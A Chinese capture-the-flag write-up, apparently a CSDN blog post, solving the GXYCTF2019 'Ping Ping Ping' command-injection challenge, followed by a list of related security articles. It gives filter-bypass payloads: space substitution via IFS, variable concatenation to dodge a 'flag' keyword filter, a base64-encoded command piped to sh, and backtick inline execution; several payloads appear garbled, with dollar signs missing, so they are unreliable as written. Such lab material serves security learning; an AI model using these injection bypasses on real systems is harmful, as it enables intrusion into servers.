[GXYCTF2019]Ping Ping Ping1

打开靶机

结合题目名称,考虑是命令注入,试试ls

结果应该就在flag.php。尝试构造命令注入载荷。 cat flag.php

可以看到过滤了空格,用 IFS1替换空格

还过滤了flag,我们用字符拼接的方式看能否绕过,a=g;catIFS1fla$a.php。注意这里用分号间隔,所以不能用管道符连接了。

可以看到flag了。这里有个坑,这段是纯php代码,所以在页面上没有显示出来,要注意观察界面的源码。

其实可以先看一下index.php

基本上可以看到过滤了哪些内容。所以还可以用base64编码绕过过滤

echoIFS1Y2F0IGZsYWcucGhw|base64IFS1-d|sh

既然ls能把flag找出来, 则还可以利用内联的方式获取flag catIFS1`ls`

放一个命令注入的介绍:命令注入以及常见绕过方式_命令注入如何绕过空色-CSDN博客

相关推荐
Demons_kirit8 小时前
实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)
网络安全
sbjdhjd10 小时前
SQL 注入零基础详解:原理、手工注入流程与 Sqli-Labs 靶场实战1~5关和第9关思路
数据库·sql·计算机网络·web安全·网络安全·网络攻击模型·安全架构
学习溢出11 小时前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
学逆向的11 小时前
汇编——寻址方式
开发语言·汇编·网络安全
上海云盾-高防顾问1 天前
SD-WAN 跨境加速,真实日常使用体验
网络·网络安全
中北marry1 天前
玄机靶场wp 应急响应-webshell查杀
网络安全
爱网络爱Linux2 天前
HCIA-Security(1)网络安全常见的威胁
web安全·网络安全·hcia-security·hcia安全·华为网络安全·网络安全常见的威胁
我不是QI2 天前
一、主持人信息(域名 网站资产情报搜集)原理解析
安全·网络安全
lubiii_2 天前
网络安全法律法规备考速查手册
安全·web安全·网络安全
2501_916008892 天前
HTTPS 抓包遇到证书绑定怎么办,使用 TraceEagle 解除 App 证书校验
网络协议·计算机网络·http·网络安全·ios·adb·https